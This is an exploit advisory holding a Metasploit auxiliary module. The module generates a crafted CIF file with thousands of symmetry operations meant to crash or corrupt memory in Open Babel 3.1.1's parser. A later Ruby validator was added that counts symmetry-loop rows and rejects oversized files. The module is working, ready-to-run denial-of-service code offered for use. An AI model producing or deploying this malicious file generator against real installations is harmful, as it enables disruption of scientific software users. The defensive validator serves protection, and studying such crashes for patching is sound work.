=============================================================================================================================================
| # Title : Open Babel 3.1.1 CIF File Memory Corruption PoC Metasploit Auxiliary Module |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://openbabel.org/index.html |
=============================================================================================================================================
[+] Summary : This Metasploit auxiliary module generates a crafted .cif file designed to test for memory corruption conditions in Open Babel 3.1.1. By providing an excessive number of symmetry operations, it triggers a crash (DoS) during file parsing.
The exact outcome depends on the target’s build, compiler settings, and memory allocator. The module includes configurable parameters for file name and iteration count, with safe upper limits to prevent framework instability.
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::FILEFORMAT
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Open Babel 3.1.1 CIF File Parsing Memory Corruption PoC',
      'Description' => %q{
        This module generates a crafted .cif file designed to test for memory corruption
        conditions in Open Babel 3.1.1. By providing an excessive number of
        symmetry operations, the module attempts to trigger a crash during the
        parsing process. The outcome may vary significantly depending on the target's
        build configuration, compiler optimizations, and memory allocator.
      },
      'License' => MSF_LICENSE,
      'Author' => [ 'indoushka' ],
      'References' =>
        [
          [ 'URL', 'https://github.com/openbabel/openbabel/issues' ]
        ],
      'Notes' =>
        {
          'Stability' => [ CRASH_SAFE ],
          'Reliability' => [ REPEATABLE ],
          'SideEffects' => [ IOC_IN_LOGS ]
        }
    ))
    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'test_case.cif']),
        OptInt.new('ITERATIONS', [ true, 'Number of symmetry operations (Limit: 1-5000)', 500])
      ])
  end

  def check
    CheckCode::Unknown
  end

  def run
    count = datastore['ITERATIONS']
    if count <= 0
      print_error("ITERATIONS must be a positive integer. Setting to default (500).")
      count = 500
    elsif count > 5000
      print_warning("ITERATIONS exceeds the safe limit of 5000. Capping for stability.")
      count = 5000
    end
    symops_array = Array.new(count) do |i|
      "'#{i + 1}*x, #{i + 1}*y, #{i + 1}*z'"
    end
    symops = symops_array.join("\n")
    cif_payload = <<~EOF
      data_OPEN_BABEL_TEST
      _cell_length_a 10.0
      _cell_length_b 10.0
      _cell_length_c 10.0
      _cell_angle_alpha 90.0
      _cell_angle_beta 90.0
      _cell_angle_gamma 90.0
      loop_
      _space_group_symop_operation_xyz
      #{symops}
    EOF
    print_status("Generating PoC file: #{datastore['FILENAME']} with #{count} iterations...")
    file_create(cif_payload)
    print_good("PoC file generated successfully.")
  end
end
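
A defensive counterpart to the module above, as an added example that is not part of the original advisory or of Open Babel: a Ruby pre-parse gate that counts the rows of each CIF symmetry-operation loop and rejects files over a limit before they reach the parser. The 192-row limit (the largest general-position count among the 230 space groups), the legacy tag `_symmetry_equiv_pos_as_xyz`, and all function names are assumptions of this example; semicolon text fields are not handled.

```ruby
SYMOP_TAGS = %w[_space_group_symop_operation_xyz _symmetry_equiv_pos_as_xyz].freeze
MAX_SYMOPS = 192 # assumption: no space group has more general positions than this

# Split one CIF line into values, keeping quoted strings as single tokens.
def cif_tokens(line)
  line.scan(/'[^']*'|"[^"]*"|[^\s'"]\S*/)
end

# Row count of every loop_ that carries a symmetry-operation tag.
def symop_loop_sizes(text)
  sizes = []
  tags = nil        # tag names of the loop being read; nil outside a loop
  values = 0        # data values seen so far in that loop
  in_header = false # true while still reading the loop's tag names
  finish = lambda do
    sizes << values / tags.size if tags && (tags & SYMOP_TAGS).any?
    tags = nil
  end
  text.each_line do |raw|
    line = raw.strip
    next if line.empty? || line.start_with?('#')
    low = line.downcase
    if low == 'loop_'
      finish.call
      tags, values, in_header = [], 0, true
    elsif tags && in_header && low.start_with?('_')
      tags << low.split.first
    elsif tags && low.start_with?('_', 'data_')
      finish.call # a new item or data block ends the loop
    elsif tags
      in_header = false
      values += cif_tokens(line).size
    end
  end
  finish.call
  sizes
end

# True when no symmetry loop exceeds the limit, so the file may go on to the parser.
def cif_symops_ok?(text, limit = MAX_SYMOPS)
  symop_loop_sizes(text).all? { |n| n <= limit }
end

# Constructed sample with the same shape as the module's default output (500 rows).
SAMPLE = "data_x\nloop_\n_space_group_symop_operation_xyz\n" +
         Array.new(500) { |i| "'#{i + 1}*x, #{i + 1}*y, #{i + 1}*z'" }.join("\n")
puts "symop rows: #{symop_loop_sizes(SAMPLE).inspect}, accepted: #{cif_symops_ok?(SAMPLE)}"
```
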
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================